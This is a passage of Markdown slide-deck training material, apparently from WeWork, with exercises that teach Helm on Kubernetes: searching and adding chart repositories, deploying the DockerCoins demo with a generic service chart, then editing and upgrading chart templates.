||||
<br/>
|
||||
(Think of it like "Debian stable", for instance.)
|
||||
|
||||
---
|
||||
|
||||
## View available charts
|
||||
|
||||
- We can view available charts with `helm search` (and an optional keyword)
|
||||
|
||||
.exercise[
|
||||
|
||||
- View all available charts:
|
||||
```bash
|
||||
helm search
|
||||
```
|
||||
|
||||
- View charts related to `prometheus`:
|
||||
```bash
|
||||
helm search prometheus
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Viewing installed charts
|
||||
|
||||
- Helm keeps track of what we've installed
|
||||
|
||||
.exercise[
|
||||
|
||||
- List installed Helm charts:
|
||||
```bash
|
||||
helm list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the WeWork repository
|
||||
|
||||
- The generic syntax is `helm repo add <nickname> <url>`
|
||||
|
||||
- We have a number of charts in Artifactory
|
||||
|
||||
- Since Artifactory is password-protected, we need to add `--username`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the WeWork repository:
|
||||
```bash
|
||||
helm repo add wework https://wework.jfrog.io/wework/helm/ --username=`jdoe`
|
||||
```
|
||||
|
||||
- When prompted, provide your password
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Looking at the WeWork repository
|
||||
|
||||
- Let's have a look at the charts in this repository
|
||||
|
||||
.exercise[
|
||||
|
||||
- Search the repository name:
|
||||
```bash
|
||||
helm search wework
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's next?
|
||||
|
||||
- We could *install an existing application that has already been packaged*:
|
||||
|
||||
`helm install wework/moonbase-climate-control`
|
||||
|
||||
(sorry folks, that one doesn't exist [yet](https://disruption.medium.com/))
|
||||
|
||||
- We could *create a chart from scratch*:
|
||||
|
||||
`helm create my-wonderful-new-app`
|
||||
|
||||
(this creates a directory named `my-wonderful-new-app` with a barebones chart)
|
||||
|
||||
- We could do something in between: *install an app using a generic chart*
|
||||
|
||||
(let's do that!)
|
||||
|
||||
---
|
||||
|
||||
## The wek8s generic service chart
|
||||
|
||||
- There is ~~an app~~ a chart for that!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for `generic service`:
|
||||
```bash
|
||||
helm search generic service
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- The one that we want is `wework/wek8s-generic-service`
|
||||
|
||||
---
|
||||
|
||||
## Inspecting a chart
|
||||
|
||||
- Before installing a chart, we can check its description, README, etc.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at all the available information:
|
||||
```bash
|
||||
helm inspect wework/wek8s-generic-service
|
||||
```
|
||||
|
||||
(that's way too much information!)
|
||||
|
||||
- Look at the chart's description:
|
||||
```bash
|
||||
helm inspect chart wework/wek8s-generic-service
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the wek8s generic chart
|
||||
|
||||
- We are going to download the chart's `values.yaml`
|
||||
|
||||
(a file showing all the possible parameters for that chart)
|
||||
|
||||
- We are going to set the parameters we need, and discard the ones we don't
|
||||
|
||||
- Then we will install DockerCoins using that chart
|
||||
|
||||
---
|
||||
|
||||
## Dumping the chart's values
|
||||
|
||||
- Let's download the chart's `values.yaml`
|
||||
|
||||
- Then we will edit it to suit our needs
|
||||
|
||||
.exercise[
|
||||
|
||||
- Dump the chart's values to a YAML file:
|
||||
```bash
|
||||
helm inspect values wework/wek8s-generic-service > values-rng.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Editing the chart's values
|
||||
|
||||
Edit `values-rng.yaml` and keep only this:
|
||||
|
||||
```yaml
|
||||
appName: rng
|
||||
replicaCount: 1
|
||||
image:
|
||||
repository: dockercoins/rng
|
||||
tag: v0.1
|
||||
service:
|
||||
enabled: true
|
||||
ports:
|
||||
- port: 80
|
||||
containerPort: 80
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying the chart
|
||||
|
||||
- We can now install a *release* of the generic service chart using these values
|
||||
|
||||
- We will do that in a separate namespace (to avoid colliding with other resources)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch to the `happyhelming` namespace:
|
||||
```bash
|
||||
kubectl config set-context --current --namespace=happyhelming
|
||||
```
|
||||
|
||||
- Install the `rng` release:
|
||||
```bash
|
||||
helm install wework/wek8s-generic-service --name=rng --values=values-rng.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: Helm will automatically create the namespace if it doesn't exist.
|
||||
|
||||
---
|
||||
|
||||
## Testing what we did
|
||||
|
||||
- If we were directly on the cluster, we could curl the service's ClusterIP
|
||||
|
||||
- But we're *not* on the cluster, so we will use `kubectl port-forward`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a port forwarding to access port 80 of Deployment `rng`:
|
||||
```bash
|
||||
kubectl port-forward deploy/rng 1234:80 &
|
||||
```
|
||||
|
||||
- Confirm that RNG is running correctly:
|
||||
```bash
|
||||
curl localhost:1234
|
||||
```
|
||||
|
||||
- Terminate the port forwarder:
|
||||
```bash
|
||||
kill %1
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the other services
|
||||
|
||||
- We need to create the values files for the other services:
|
||||
|
||||
- `values-hasher.yaml` → almost identical (just change name and image)
|
||||
|
||||
- `values-webui.yaml` → same
|
||||
|
||||
- `values-redis.yaml` → same, but adjust port number
|
||||
|
||||
- `values-worker.yaml` → same, but we can even remove the `service` part
|
||||
|
||||
- Then create all these services, using these YAML files
|
||||
|
||||
---
|
||||
|
||||
# Exercise — deploying an app with the wek8s Generic chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the 4 YAML files mentioned previously
|
||||
|
||||
- Install 4 Helm releases (one for each YAML file)
|
||||
|
||||
- What do we see in the logs of the worker?
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
- We should see errors like this:
|
||||
```
|
||||
Error -2 connecting to redis:6379. Name does not resolve.
|
||||
```
|
||||
|
||||
- Why?
|
||||
|
||||
--
|
||||
|
||||
- Hint: `kubectl get services`
|
||||
|
||||
--
|
||||
|
||||
- Our services are named `redis-service`, `rng-service`, etc.
|
||||
|
||||
- Our code connects to `redis`, `rng`, etc.
|
||||
|
||||
- We need to drop the extra `-service`
|
||||
|
||||
---
|
||||
|
||||
## Editing a chart
|
||||
|
||||
- To edit a chart, we can push a new version to the repository
|
||||
|
||||
- But there is a much simpler and faster way
|
||||
|
||||
- We can use Helm to download the chart locally, make changes, apply them
|
||||
|
||||
- This also works when creating / developing a chart
|
||||
|
||||
(we don't need to push it to the repository to try it out)
|
||||
|
||||
---
|
||||
|
||||
## Before diving in ...
|
||||
|
||||
.warning[Before editing or forking a generic chart like this one ...]
|
||||
|
||||
- Have a conversation with the authors of the chart
|
||||
|
||||
- Perhaps they can suggest other options, or adapt the chart
|
||||
|
||||
- We will edit the chart here, as a learning experience
|
||||
|
||||
- It may or may not be the right course of action in the general case!
|
||||
|
||||
---
|
||||
|
||||
## Download the chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Fetch the generic service chart to have a local, editable copy:
|
||||
```bash
|
||||
helm fetch wework/wek8s-generic-service --untar
|
||||
```
|
||||
|
||||
- This creates the directory `wek8s-generic-service`
|
||||
|
||||
- Have a look!
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Chart structure
|
||||
|
||||
Here is the structure of the directory containing our chart:
|
||||
|
||||
```
|
||||
$ tree wek8s-generic-service/
|
||||
wek8s-generic-service/
|
||||
├── Chart.yaml
|
||||
├── migrations
|
||||
│ └── ...
|
||||
├── README.md
|
||||
├── templates
|
||||
│ ├── _appContainer.yaml
|
||||
│ ├── configmaps.yaml
|
||||
│ ├── ... more YAML ...
|
||||
│ ├── ... also, some .tpl files ...
|
||||
│ ├── NOTES.txt
|
||||
│ ├── ... more more YAML ...
|
||||
│ └── ... and more more .tpl files
|
||||
└── values.yaml
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- `Chart.yaml` → chart short descriptipon and metadata
|
||||
|
||||
- `README.md` → longer description
|
||||
|
||||
- `values.yaml` → the file we downloaded earlier
|
||||
|
||||
- `templates/` → files in this directory will be *rendered* when the chart is installed
|
||||
|
||||
- after rendering, each file is treated as a Kubernetes resource YAML file
|
||||
|
||||
- ... except the ones starting with underscore (these will contain templates)
|
||||
|
||||
- ... and except `NOTES.txt`, which is shown at the end of the deployment
|
||||
|
||||
Note: file extension doesn't really matter; the leading underscore does.
|
||||
|
||||
---
|
||||
|
||||
## Templates details
|
||||
|
||||
- Helm uses an extension of the Go template package
|
||||
|
||||
- This means that the files in `templates/` will be peppered with `{{ ... }}`
|
||||
|
||||
- For instance, this is an excerpt of `wek8s-generic-service/templates/service.yaml`:
|
||||
```yaml
|
||||
metadata:
|
||||
name: {{ .Values.appName }}-service
|
||||
labels:
|
||||
app: {{ .Values.appName }}
|
||||
```
|
||||
|
||||
- `{{ .Values.appName }}` will be replaced by the `appName` field from the values YAML
|
||||
|
||||
- For more details about the templating system, see the [Helm docs](https://helm.sh/docs/chart_template_guide/)
|
||||
|
||||
---
|
||||
|
||||
## Editing the templates
|
||||
|
||||
- Let's remove the trailing `-service` in the service definition
|
||||
|
||||
- Then, we will roll out that change
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the file `wek8s-generic-service/templates/service.yaml`
|
||||
|
||||
- Remove the `-service` suffix
|
||||
|
||||
- Roll out the change to the `redis` release:
|
||||
```bash
|
||||
helm upgrade redis wek8s-generic-service
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- We used `upgrade` instead of `install` this time
|
||||
|
||||
- We didn't need to pass again the YAML file with the values
|
||||
|
||||
---
|
||||
|
||||
## Viewing our changes
|
||||
|
||||
- Normally, we "fixed" the `redis` service
|
||||
|
||||
- The `worker` should now be able to contact `redis`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of the `worker`:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail 10 --follow
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- Alright, now we need to fix `rng`, `hasher`, and `webui` the same way
|
||||
|
||||
---
|
||||
|
||||
## Fixing the other services
|
||||
|
||||
- We don't need to download the chart or edit it again
|
||||
|
||||
- We can use the same chart for the other services
|
||||
|
||||
.exercise[
|
||||
|
||||
- Upgrade `rng`, `hasher`, and `webui` with the updated chart
|
||||
|
||||
- Confirm that the `worker` works correctly
|
||||
|
||||
(it should say, "X units of work done ...")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extra steps
|
||||
|
||||
(If time permits ...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Setup a `port-forward` to view the web UI
|
||||
|
||||
- Scale the `worker` by updating the `replicaCount`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exposing a web application
|
||||
|
||||
- How do we expose the web UI with a proper URL?
|
||||
|
||||
- We will need to use an *Ingress*
|
||||
|
||||
- More on that later!
|
||||
|
||||
---
|
||||
|
||||
## If we wanted to submit our changes
|
||||
|
||||
- The source of the wek8s-generic-chart is in the following GitHub repository:
|
||||
|
||||
https://github.com/WeConnect/WeK8s-charts
|
||||
|
||||
(along with many other charts)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Good to know ...
|
||||
|
||||
- If we don't specify `--name` when running `helm install`, a name is generated
|
||||
|
||||
(like `wisfhul-elephant` or `nihilist-alligator`)
|
||||
|
||||
- If we want to install-or-upgrade, we can use `helm upgrade --install`:
|
||||
|
||||
`helm upgrade <name> <chart> --install --values=...`
|
||||
|
||||
- If we only want to set a few values, we can use `--set`, for instance:
|
||||
|
||||
`helm upgrade redis wke8s-generic-chart --values=... --set=replicaCount=5`
|
||||
|
||||
(we can use `--set` multiple times if needed)
|
||||
|
||||
.warning[If we specify `--set` without `--values`, it erases all the other values!]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## If the first deployment fails
|
||||
|
||||
- If the first deployment of a release fails, it will be in an inconsistent state
|
||||
|
||||
- Further attempts to `helm install` or `helm upgrade` will fail
|
||||
|
||||
- To fix the problem, two solutions:
|
||||
|
||||
- `helm delete --purge` that release
|
||||
|
||||
- `helm upgrade --force` that release
|
||||
|
||||
- This only applies to the first deployment
|
||||
|
||||
(i.e., Helm knows how to recover if a subsequent deployment fails)
|
||||